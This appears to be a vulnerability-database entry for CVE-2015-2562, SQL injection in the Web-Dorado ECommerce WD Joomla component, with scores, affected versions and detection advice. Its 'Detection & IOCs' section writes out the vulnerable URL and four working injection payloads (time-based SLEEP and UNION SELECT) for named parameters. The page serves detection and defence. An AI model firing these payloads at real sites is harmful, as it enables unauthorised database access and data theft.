cbcvebase.
CVE-2015-2562
published 2015-03-20

CVE-2015-2562: Multiple SQL injection vulnerabilities in the Web-Dorado ECommerce WD (com_ecommercewd) component 1.2.5 for Joomla! allow remote attackers to execute arbitrary…

PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
38.95%
98.4th percentile
Multiple SQL injection vulnerabilities in the Web-Dorado ECommerce WD (com_ecommercewd) component 1.2.5 for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) search_category_id, (2) sort_order, or (3) filter_manufacturer_ids in a displayproducts action to index.php.

Affected

1 ranges
VendorProductVersion rangeFixed in
web-doradoecommerce_wd

Detection & IOCsextracted from sources · hover to see the quote

url/index.php?option=com_ecommercewd&controller=products&task=displayproducts
commandfilter_manufacturer_ids=1) AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND (1480=1480
commandsearch_category_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND (1251=1251
commandsearch_category_id=1) UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--
commandsort_order=asc,(SELECT (CASE WHEN (6064=6064) THEN SLEEP(5) ELSE 6064*(SELECT 6064 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
bytes
0x71786a6b71
  • Monitor POST requests to /index.php with query parameters option=com_ecommercewd, controller=products, and task=displayproducts. Inspect POST body for SQL injection patterns in search_category_id, sort_order, and filter_manufacturer_ids parameters.
  • Detect UNION-based SQLi by alerting on UNION ALL SELECT CONCAT with hex-encoded boundary markers (0x71786a6b71, 0x71706a6a71) in POST body to com_ecommercewd endpoints.
  • A Metasploit auxiliary scanner module exists for this vulnerability; scan logs for automated exploitation attempts against the displayproducts action.
  • ·The vulnerability is unauthenticated — no session or login is required to exploit it, meaning perimeter authentication controls alone are insufficient.
  • ·Version 1.2.5 is confirmed vulnerable; prior versions are also likely affected per the Metasploit module description.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.